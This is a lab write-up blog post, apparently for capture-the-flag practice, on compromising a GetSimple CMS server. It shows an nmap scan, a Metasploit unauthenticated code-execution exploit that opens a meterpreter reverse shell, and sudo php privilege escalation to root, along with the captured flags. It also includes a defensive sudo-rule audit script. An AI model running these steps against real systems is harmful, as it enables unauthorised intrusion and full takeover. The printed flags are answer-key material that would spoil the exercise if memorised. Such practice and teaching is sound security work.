Daily Practice
Problem
Solution
Question 1
First, run an nmap scan to gather information about the target
┌──(root㉿HgTrojan)-[~]
└─# nmap -sV -sC 10.129.86.24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-26 06:00 EST
Nmap scan report for 10.129.86.24
Host is up (1.1s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
| 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/admin/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.36 seconds
Search Metasploit for known GetSimple vulnerabilities
┌──(root㉿HgTrojan)-[~]
└─# msfconsole
Metasploit tip: Start commands with a space to avoid saving them to history
=[ metasploit v6.3.51-dev ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
search GetSimple
msf6 > search GetSimple
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability
1 exploit/multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/getsimplecms_unauth_code_exec
msf6 >
Exploit the vulnerability to gain a foothold
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show options
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-m
etasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.10.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 GetSimpleCMS 3.3.15 and before
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 10.129.86.24
rhosts => 10.129.86.24
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set lhost tun0
lhost => 10.10.16.25
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.16.25:4444
[*] Sending stage (39927 bytes) to 10.129.86.24
[*] Meterpreter session 1 opened (10.10.16.25:4444 -> 10.129.86.24:36112) at 2024-01-26 06:06:14 -0500
[*] Sending stage (39927 bytes) to 10.129.86.24
[*] Meterpreter session 2 opened (10.10.16.25:4444 -> 10.129.86.24:36116) at 2024-01-26 06:06:25 -0500
meterpreter >
Locate the target txt file and print it, which completes question 1
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 4096 dir 2021-05-07 10:28:39 -0400 mrb3n
meterpreter > cd mrb3n
meterpreter > ls
Listing: /home/mrb3n
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2024-01-26 04:01:36 -0500 .bash_history
100644/rw-r--r-- 220 fil 2020-02-25 07:03:22 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2020-02-25 07:03:22 -0500 .bashrc
040700/rwx------ 4096 dir 2021-02-09 04:12:07 -0500 .cache
100644/rw-r--r-- 807 fil 2020-02-25 07:03:22 -0500 .profile
100644/rw-r--r-- 0 fil 2021-02-09 05:56:38 -0500 .sudo_as_admin_successful
100600/rw------- 10332 fil 2021-05-07 10:28:39 -0400 .viminfo
100664/rw-rw-r-- 33 fil 2021-02-16 06:00:55 -0500 user.txt
meterpreter > cat user.txt
7002d65b149b0a4d19132a66feed21d8
Question 2
Complete it using a php shell
Reference for the command: https://gtfobins.github.io/gtfobins/php/
Detailed procedure:
meterpreter > shell
Process 75314 created.
Channel 1 created.
whoami
www-data
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
# We can see that we (i.e. www-data) may run /usr/bin/php as ALL (any user) with NOPASSWD
# Start a /bin/sh shell
CMD="/bin/sh"
# Run PHP code directly as the superuser; the code calls PHP's system function, which executes system commands. It runs the shell command stored in the $CMD variable, here /bin/sh.
sudo php -r "system('$CMD');"
# With that we have obtained root privileges
whoami
root
Locate the target txt file and print it, which completes question 2
cat /root/root.txt
f1fba6e9f71efb2630e6e34da6387842
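As an added, defender-side example that is not part of the original write-up: a small Python audit that parses `sudo -l` output like the one shown above (the sample text is constructed from it) and flags rules that let the caller run a shell-capable interpreter such as php as root. The SHELL_CAPABLE list is an assumption, a short subset of the binaries catalogued on GTFOBins.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: the `sudo -l` output from the walkthrough, plus one benign rule.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) /usr/bin/systemctl restart apache2
"""

# Assumed, non-exhaustive list of binaries that can spawn a shell or run arbitrary
# code when executed through sudo (interpreters, editors, pagers). Extend from GTFOBins.
SHELL_CAPABLE = {"php", "python", "python3", "perl", "ruby", "bash", "sh",
                 "vim", "vi", "less", "more", "awk", "find", "env"}

# A sudoers rule line as printed by `sudo -l`: "(runas) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")

@dataclass
class Finding:
    runas: str
    nopasswd: bool
    command: str
    reason: str

def audit_sudo_l(text: str) -> List[Finding]:
    """Return the rules that let the caller run a shell-capable binary as root."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").strip()
        cmd = m.group("cmd").strip()
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        # (ALL : ALL) or (root) means the command may run as root; that is the critical case.
        as_root = "ALL" in runas.split() or "root" in runas.split()
        if as_root and binary in SHELL_CAPABLE:
            nopasswd = "NOPASSWD" in m.group("tags").upper()
            findings.append(Finding(runas, nopasswd, cmd, f"{binary} can spawn a root shell"))
    return findings
```

The fix for the flagged rule is to remove it, or to replace the bare interpreter with a fixed, root-owned script that takes no arguments.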
All of my articles are technical write-ups recorded for defensive purposes; every operation was carried out in a lab environment. Do not use them for any other purpose, or you bear the consequences. Unless otherwise stated, all articles on this blog are licensed under BY-NC-SA. Please credit the source when reposting!
It's going to be the end of my day, but before ending I am reading this fantastic paragraph to
improve my knowledge.
tokekwin
You actually make it seem so easy with your presentation, but I find this
topic to be something which I think I would never understand.
It seems too complicated and very broad for
me. I am looking forward to your next post; I will try to
get the hang of it!
I'm now not sure where you're getting your information, but good topic.
I need to spend a while learning more or working out
more. Thanks for the magnificent info; I was in search of this info for my mission.
Thank you for liking it
I've been exploring for a little while for any high-quality articles or weblog posts on this sort of area.
Exploring in Yahoo I ultimately stumbled upon this site.
Reading this info, I am glad to convey that I've an incredibly good
uncanny feeling I discovered exactly what I needed.
I most indisputably will make certain not to forget this site and
give it a glance on a continuing basis.
Thank you for liking it
Just wish to say your article is astonishing.
The clearness of your post is simply great and I can think you are knowledgeable on this
subject. Fine, with your permission let me grab your feed to stay up to date with forthcoming posts.
Thanks a million and please carry on the gratifying work.
Of course. Thank you for liking it
I think that what you published was very reasonable.
However, think on this: what if you added a little information? I mean, I
don't wish to tell you how to run your website, but what if
you added something that grabbed people's attention? I mean "Daily Practice - HgTrojan" is kinda plain. You could peek at Yahoo's
front page and see how they create news titles
to get viewers to click. You might add a related video
or a picture or two to get readers interested in everything you've got to say.
In my opinion, it might make your website a little bit more interesting.
Thank you
Hi there, would you mind sharing which blog platform you're using?
I'm planning to start my own blog soon but I'm having a hard time deciding between BlogEngine/Wordpress/B2evolution and Drupal.
The reason I ask is because your layout seems different from most
blogs and I'm looking for something completely unique.
P.S. My apologies for getting off-topic but I had to
ask!
Typecho